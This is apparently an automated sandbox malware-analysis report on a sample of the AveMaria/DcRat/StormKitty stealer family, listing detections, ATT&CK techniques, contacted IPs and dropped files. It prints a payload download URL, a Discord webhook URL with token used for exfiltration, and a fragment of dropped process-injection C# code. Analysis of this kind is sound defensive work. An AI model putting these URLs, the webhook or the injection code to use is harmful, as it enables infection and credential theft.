Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Yara detected BrowserPasswordDump

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Yara detected DcRat

Source: Yara match

File source: 00000004.00000002.4148154004.000000000304D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected StormKitty Stealer

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	1 DLL Side-Loading	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Obfuscated Files or Information	LSA Secrets	24 System Information Discovery	SSH	Keylogging	11 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vfdjo.exe	61%	ReversingLabs	Win32.Infostealer.Tinba
vfdjo.exe	63%	Virustotal		Browse
vfdjo.exe	100%	Avira	TR/Dropper.Gen
vfdjo.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://147.45.44.131/infopage/yijth.exe0	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/yijth.exe_2	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/yijth.exe	0%	Avira URL Cloud	safe
http://147.45.448	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://147.45.44.131/infopage/yijth.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stackoverflow.com/q/14436606/23354cIt	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://ipinfo.io/ip	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721393679.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721393679.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v6/users/	RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/yijth.exe_2	vfdjo.exe, 00000000.00000002.1723757668.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000001.00000003.1686756542.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1686578450.0000000004DE3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000002.1688333242.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, lvbdqmie.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/yijth.exe0	csc.exe, 00000001.00000003.1687233660.0000000004CB1000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urn.to/r/sds_see	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vfdjo.exe, 00000000.00000002.1721393679.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_seeaCould	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.newtonsoft.com/jsonschema	vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://147.45.44.131	vfdjo.exe, 00000000.00000002.1721393679.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721393679.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.448	vfdjo.exe, 00000000.00000002.1721393679.0000000002C90000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false
157.20.182.177	unknown	unknown		24297	FCNUniversityPublicCorporationOsakaJP	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582971
Start date and time:	2025-01-01 08:53:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vfdjo.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/9@0/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:54:02	API Interceptor	1x Sleep call for process: vfdjo.exe modified
02:54:06	API Interceptor	8964100x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/hgfpj.exe
	qoqD1RxV0F.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/inbg.exe
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/inbg.exe
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/bnkh.exe
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/ilk.exe
	Captcha.hta	Get hash	malicious	HTMLPhisher	Browse	147.45.44.131/infopage/bgfi.ps1
	Captcha.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/vsom.exe
157.20.182.177	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse
	bKxtUOPLtR.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FCNUniversityPublicCorporationOsakaJP	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	157.20.182.177
	bKxtUOPLtR.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	157.20.182.177
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	157.20.182.177
	armv4l.elf	Get hash	malicious	Mirai	Browse	163.227.210.66
	2.elf	Get hash	malicious	Unknown	Browse	157.20.21.157
	1.elf	Get hash	malicious	Unknown	Browse	157.20.21.140
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	157.20.218.11
	3.elf	Get hash	malicious	Unknown	Browse	157.20.207.5
	3.elf	Get hash	malicious	Unknown	Browse	157.20.68.123
	3.elf	Get hash	malicious	Unknown	Browse	157.16.228.185
FREE-NET-ASFREEnetEU	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131
	search.hta	Get hash	malicious	Unknown	Browse	147.45.112.248
	e9aa0b4540115b3dcec3af70b6de27e54e4a0fa96d1d3.exe	Get hash	malicious	RedLine	Browse	147.45.44.224
	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	147.45.44.151

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.1307801111573577
Encrypted:	false
SSDEEP:	6:kKFaAMD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:QwDnLNkPlE99SNxAhUe/3
MD5:	D2C4179394B6D497014620137009D282
SHA1:	FFD847EAC0E7E8EC6022BAD1521919BCD86AFB27
SHA-256:	53EE0BCEE0FD2E3E8E581D39692E380B33E0D7968371584985A7EC90661ABCB3
SHA-512:	7FFA1C2C2CF8974FBB4E8546E3B7082CC5E1329C6123C21D09C5D35B279754A22CB4740C814E07AA125F7825F9E311E39B3328C563CB13135AB83E46E0A47CBE
Malicious:	false
Reputation:	low
Preview:	p...... ..........pU"\..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vfdjo.exe.log

Download File

Process:	C:\Users\user\Desktop\vfdjo.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\RESD93C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jan 1 09:39:09 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9666914137529825
Encrypted:	false
SSDEEP:	24:H6e9EuZfWNXDfHswKEbsmfII+ycuZhNbYakSINPNnqSqd:nBqzTKPmg1ulka3oqSK
MD5:	9DC50F25F6B4005CD60C9083C210AA70
SHA1:	059B37E8A258F4BAEF212EFB0E4A7DDE7211EC87
SHA-256:	F221317552A321ABA7A2B29320181A950FE0ABDACE5BC9E3694EEF423AD522AB
SHA-512:	954B2F025A0F1293D7919BFD9DB0D1B194100BBA4595C9647153D58364F9ACB0233E058B2895BCF9DFA4E25F13411449B939CAA94541EEC168E87D36917F3453
Malicious:	false
Preview:	L...=.ug.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP................!..g{.2.0.B...i...........4.......C:\Users\user\AppData\Local\Temp\RESD93C.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.v.b.d.q.m.i.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.090008571184223
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyAYak7YnqqvANPN5Dlq5J:+RI+ycuZhNbYakSINPNnqX
MD5:	21E1DE677BA332CF300D429DB2E86901
SHA1:	1006AFBFECC6ED408A67B57920BB300318340257
SHA-256:	2F73F8D50235F077A4DC0C80FF0DE54253AB814159B5A478E9D7C189CE8C8B09
SHA-512:	355C432DDC9CC1F239EF35FE8D626D8F2174F65AB8E565D9FF758236DD9529B2FAB993CFC58C9866276396A34C0BAC601D55B51D7EC8C1DDF6FF4160004B532F
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.v.b.d.q.m.i.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.v.b.d.q.m.i.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.0.cs

Download File

Process:	C:\Users\user\Desktop\vfdjo.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	11063
Entropy (8bit):	4.546700076718714
Encrypted:	false
SSDEEP:	192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6PT:2oYLoH97t/Z7pgjvzf5uT
MD5:	B5C3A2D03FF4C721192716F326C77DEA
SHA1:	6B754FD988CA58865674B711ABA76D3C6B2C5693
SHA-256:	AB42FE5FD08CB87663E130F99F96124FDD37D825D081B9712B0BAD8B6F270FAC
SHA-512:	D32E5A98C12B6B85D1913555EA54F837CD0FC647CA945AEF9D75FFADE06506BE1F4A2348827F11C4EEAE0796E4156C8F352E3C0F9A6E2CDC93CB501BCDF2C248
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline

Download File

Process:	C:\Users\user\Desktop\vfdjo.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.9897895724364085
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2wkn23fZZUzxszIwkn23fZD:p37L/6KRfxZUQfxD
MD5:	EEDC206B11A47C6C3E158BAF6C9E519C
SHA1:	60BB24421A8B16DA63C29ED5EBAC453C5EA1B906
SHA-256:	18A20849461BF287F774EB201C7B1835124598BA695BA74A60536C1D5F0BA25B
SHA-512:	855B7E742807D4E6E75F4049E4B3FD4AE8DFD710FAD838AB1D5AF65301E012E5C2BB3F2BC5E53E393352A22BFE8971273B0E5A58D5E618F66963860854EFCC2F
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.0.cs"

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.6282487458130435
Encrypted:	false
